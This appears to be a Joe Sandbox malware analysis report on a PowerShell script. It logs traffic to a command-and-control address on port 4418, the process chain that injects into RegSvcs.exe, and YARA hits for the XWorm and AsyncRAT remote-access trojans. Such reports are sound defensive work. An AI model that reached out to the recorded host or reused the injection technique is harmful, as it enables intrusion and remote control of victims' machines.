                                          Jan 14, 2025 08:29:37.121001005 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:37.209723949 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:37.215818882 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:37.722425938 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:37.739551067 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:37.744581938 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:39.194014072 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:39.199126005 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:39.411657095 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:39.415353060 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:39.420278072 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:44.932971001 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:44.992671967 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:50.383704901 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:50.388766050 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:51.180581093 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:51.225014925 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:51.250458002 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:51.256494045 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:53.366085052 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:53.371278048 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:53.588912010 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:53.591335058 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:53.596251965 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:00.709546089 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:00.714507103 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:00.926929951 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:00.932702065 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:00.937560081 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:01.834578037 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:01.839667082 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:01.850212097 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:01.855052948 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:02.051886082 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:02.053255081 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:02.058120966 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:02.201358080 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:02.202639103 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:02.207576036 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:13.081522942 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:13.086400986 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:13.305969000 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:13.307924986 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:13.312741041 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:15.214395046 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:15.256253958 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:20.931236029 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:20.936077118 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:21.148508072 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:21.193787098 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:21.244122982 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:21.248893976 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:22.350375891 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:22.355420113 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:22.589673042 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:22.591933966 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:22.596868038 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:22.741008043 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:22.745856047 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:22.980737925 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:22.984877110 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:22.989758015 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:28.287822008 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:28.292829990 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:28.353056908 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:28.357899904 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:28.397641897 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:28.402518988 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:28.505064964 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:28.506876945 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:28.511733055 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:28.553350925 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:28.558247089 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:28.628000975 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:28.629442930 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:28.634182930 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:28.749463081 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:28.750818014 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:28.755623102 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:28.871835947 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:28.873137951 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:28.878084898 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:33.709711075 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:33.714956045 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:33.927248955 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:33.929261923 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:33.934098959 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:44.709855080 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:44.714835882 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:44.740942955 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:44.745846987 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:44.756608009 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:44.761519909 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:44.927198887 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:44.929510117 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:44.934335947 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:45.048649073 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:45.178898096 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:45.179240942 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:45.180502892 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:45.185296059 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:45.185470104 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:45.190327883 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:55.947011948 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:55.951951027 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:56.914324999 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:56.916244030 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:56.921125889 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:00.553406000 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:00.558309078 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:00.770509958 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:00.774964094 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:00.779783010 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:05.944236040 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:05.949325085 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:06.161472082 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:06.163090944 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:06.167948961 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:07.350474119 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:07.356511116 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:07.568542004 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:07.570003033 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:07.574892044 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:08.834703922 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:08.839665890 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:09.051996946 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:09.053539991 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:09.058371067 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:14.979305029 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:15.131576061 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:16.506602049 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:16.511697054 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:16.537868023 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:16.542999983 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:16.724495888 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:16.726844072 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:16.731861115 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:16.846847057 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:16.848458052 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:16.853338003 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:21.959997892 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:21.965954065 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:22.178348064 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:22.187058926 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:22.192076921 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:26.865995884 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:26.871005058 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:27.083048105 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:27.084367037 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:27.089252949 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:29.069143057 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:29.074110985 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:29.286494017 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:29.287317991 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:29.292058945 CET44184971492.255.57.112192.168.2.6

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jan 14, 2025 08:27:53.653747082 CET5359502162.159.36.2192.168.2.6
                                          Jan 14, 2025 08:27:54.135080099 CET5872353192.168.2.61.1.1.1
                                          Jan 14, 2025 08:27:54.142162085 CET53587231.1.1.1192.168.2.6

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Jan 14, 2025 08:27:54.135080099 CET192.168.2.61.1.1.10xf8eStandard query (0)15.164.165.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Jan 14, 2025 08:27:54.142162085 CET1.1.1.1192.168.2.60xf8eName error (3)15.164.165.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:02:27:21
                                          Start date:14/01/2025
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_1.112.ps1"
                                          Imagebase:0x7ff6e3d50000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2168812433.0000021C4AEDB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2168812433.0000021C4AEDB000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2168812433.0000021C4A4DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2168812433.0000021C4A4DB000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:1
                                          Start time:02:27:21
                                          Start date:14/01/2025
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:3
                                          Start time:02:27:24
                                          Start date:14/01/2025
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                          Imagebase:0x760000
                                          File size:45'984 bytes
                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.4565884702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.4565884702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.4568648694.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:false

                                          General

                                          Target ID:4
                                          Start time:02:27:24
                                          Start date:14/01/2025
                                          Path:C:\Windows\System32\wermgr.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "3728" "2668" "2508" "2672" "0" "0" "2676" "0" "0" "0" "0" "0"
                                          Imagebase:0x7ff794bc0000
                                          File size:229'728 bytes
                                          MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:2.4%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:0%
                                            Total number of Nodes:7
                                            Total number of Limit Nodes:0
                                            execution_graph 5565 7ffd3488ef08 5566 7ffd3488eec8 5565->5566 5566->5565 5567 7ffd3488ef7a ResumeThread 5566->5567 5568 7ffd3488efa6 5567->5568 5569 7ffd3488f550 5570 7ffd3488f597 Wow64SetThreadContext 5569->5570 5572 7ffd3488f654 5570->5572

                                            Executed Functions

                                            Function 00007FFD3488F364 Relevance: 1.8, APIs: 1, Instructions: 302COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2198354057.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34880000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8b1321a2fbbbae7718134bb2cc296be74bf36614395ae457e043f24de56a6bc5
                                            • Instruction ID: 7cf6b7b4240a8ba22c9fc1b400055f16fb57c03c3e18caba262b46fe7399b492
                                            • Opcode Fuzzy Hash: 8b1321a2fbbbae7718134bb2cc296be74bf36614395ae457e043f24de56a6bc5
                                            • Instruction Fuzzy Hash: AB911631E0C7980FD72A9F6C58650B47BE1EF97301B1846BED9CAC7193D928A80BC795
                                            Function 00007FFD3488F13F Relevance: 1.8, APIs: 1, Instructions: 256COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2198354057.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34880000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 82fd8e7fa2f6ffef934c79e5e78dfb85b336bc59111aa82d15125c44d7f74af3
                                            • Instruction ID: 18dcbd915c761830af221c3c925d90aa9b7a79ab6ab2296e2d7df29e0ed45b7d
                                            • Opcode Fuzzy Hash: 82fd8e7fa2f6ffef934c79e5e78dfb85b336bc59111aa82d15125c44d7f74af3
                                            • Instruction Fuzzy Hash: 51712331A0C7880FD72A9F6858A50B87FE1EF57311B1846BFD58AC7193DA28A807C751
                                            Function 00007FFD3488F550 Relevance: 1.6, APIs: 1, Instructions: 149threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2198354057.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34880000_powershell.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 83a4f242200014ccb88908fba170dd44de4468928ae59352fba8a7120d1ed9c5
                                            • Instruction ID: 376fa9ff13d6ac8dea75f0f5d36d28e37283253d897ad2cb680b9d5465826607
                                            • Opcode Fuzzy Hash: 83a4f242200014ccb88908fba170dd44de4468928ae59352fba8a7120d1ed9c5
                                            • Instruction Fuzzy Hash: D641F63190D7844FD72A9BB858656E97FF0EF57321F0942AFD089C7193DB28680AC752
                                            Function 00007FFD3488EF08 Relevance: 1.6, APIs: 1, Instructions: 124threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2198354057.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34880000_powershell.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 2b47747c177a103ff60203badc9691a3620d53a617e4190e9353900e2704cf10
                                            • Instruction ID: f8ddf98d22fd7f1a3291ef734aeb407faf959140c0b2ca274fe48d854f599cd8
                                            • Opcode Fuzzy Hash: 2b47747c177a103ff60203badc9691a3620d53a617e4190e9353900e2704cf10
                                            • Instruction Fuzzy Hash: 8431C631A0CB4C8FDB99DF9884966F97BE0EF56320F0441AFD049D7293DA799805CB51
                                            Function 00007FFD34951C29 Relevance: .4, Instructions: 390COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2199251240.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34950000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4eecff9a9aab836b5def49e4f5cc686582549b08c0dd79fa268fff8a62f36ff8
                                            • Instruction ID: 2b26a441b775c3da9317e0f2d3eb63d0364958aa76c1a0dea1c8841cef990e09
                                            • Opcode Fuzzy Hash: 4eecff9a9aab836b5def49e4f5cc686582549b08c0dd79fa268fff8a62f36ff8
                                            • Instruction Fuzzy Hash: B7B14922F0EB890FE796972C98A61B47BD1EF47220B1902FFD18DC7197DE196C0A9351
                                            Function 00007FFD3495149A Relevance: .1, Instructions: 107COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2199251240.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34950000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aa3e9af129e353e23c066251fa15a6a7e391e76319e0dc6c659ae8b11fa9e4c7
                                            • Instruction ID: 663faf7b17873a6f14e8722e271b8a37fb7337c8f765b3add94e5bc87dab55d9
                                            • Opcode Fuzzy Hash: aa3e9af129e353e23c066251fa15a6a7e391e76319e0dc6c659ae8b11fa9e4c7
                                            • Instruction Fuzzy Hash: 4E212C32F0CA190FFBA49A9C64675F8B3D1EF95260B2801FBD54EC3196DE2DAC165390
                                            Function 00007FFD349514C1 Relevance: .0, Instructions: 41COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2199251240.00007FFD34950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34950000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34950000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 00c1efe4655b2b09c431ff398a4e841426f33d96153b67ba2beeb4a015e4a0e9
                                            • Instruction ID: 8329b2ad60c48bf45d9e9a80cfef35a2461dd9b9d731bfc6ff9a779d6a3168c1
                                            • Opcode Fuzzy Hash: 00c1efe4655b2b09c431ff398a4e841426f33d96153b67ba2beeb4a015e4a0e9
                                            • Instruction Fuzzy Hash: 77F02713F0D9190BF7E09A9C34771F457C1EFA662175802FBD94EC325ADC286C161390

                                            Non-executed Functions

                                            Function 00007FFD34886239 Relevance: 2.1, Strings: 1, Instructions: 822COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2198354057.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34880000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: |
                                            • API String ID: 0-2343686810
                                            • Opcode ID: 35a8452b9eb008682ec918f989984c45e0aafb287c55f029df9979fe541c72c4
                                            • Instruction ID: 7bb398821c9632b5ceae505d59afdba34c21c0154511b474cb2d6746f9da985f
                                            • Opcode Fuzzy Hash: 35a8452b9eb008682ec918f989984c45e0aafb287c55f029df9979fe541c72c4
                                            • Instruction Fuzzy Hash: 9842F931B0CA8D4FE7A5DB6884A16B97BE1FF5A310B0501BAD14DD72A2DE2DAC06C741
                                            Function 00007FFD348840FA Relevance: .2, Instructions: 221COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2198354057.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34880000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a6df41c37884e644ce4f678f66ea0c96099b2918151eef6462eab5163d2f38ca
                                            • Instruction ID: 44a6431a1748f5888c900bdf0976576c80afaac5fee265b870bb21189948790a
                                            • Opcode Fuzzy Hash: a6df41c37884e644ce4f678f66ea0c96099b2918151eef6462eab5163d2f38ca
                                            • Instruction Fuzzy Hash: D161745BA0E7D25FF792936858B64D63FE4DF53624B0900F7C684CB093F91D2806A262
                                            Function 00007FFD34883E65 Relevance: .2, Instructions: 163COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2198354057.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34880000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2dce77e5c9e47bb5a4c3cab7b7a5d72e614c52b2d826ed9d5e78c8b0bf3002db
                                            • Instruction ID: aa1fb32e53a194b1c92c7b007ded0bc3587188aa1b8e032a67de7aa8c0cb9727
                                            • Opcode Fuzzy Hash: 2dce77e5c9e47bb5a4c3cab7b7a5d72e614c52b2d826ed9d5e78c8b0bf3002db
                                            • Instruction Fuzzy Hash: 535122A7E0D7C61FF7A2437868B61D92FE4DF53224B0A11B2CAD8CE493E90D2D179251
                                            Function 00007FFD34889907 Relevance: .1, Instructions: 140COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2198354057.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34880000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2585148ac581de5d63964e53f8a140636b6d75e9f9670fef91fc684fefa1b50f
                                            • Instruction ID: 3ee80a221af6e5cb151708b6dca69e85f6a9cde7ec91e62209112db5b7f30c71
                                            • Opcode Fuzzy Hash: 2585148ac581de5d63964e53f8a140636b6d75e9f9670fef91fc684fefa1b50f
                                            • Instruction Fuzzy Hash: 7741172160D6C50FD71E973888A50B53FA6EB8722472982FED587CB2E7D8185817C791
                                            Function 00007FFD3488A769 Relevance: .1, Instructions: 140COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2198354057.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34880000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 08bbf0ac43451d1a96530c57ae8ca3d1aec711a22fca05b70c77ce1b19c3c9f6
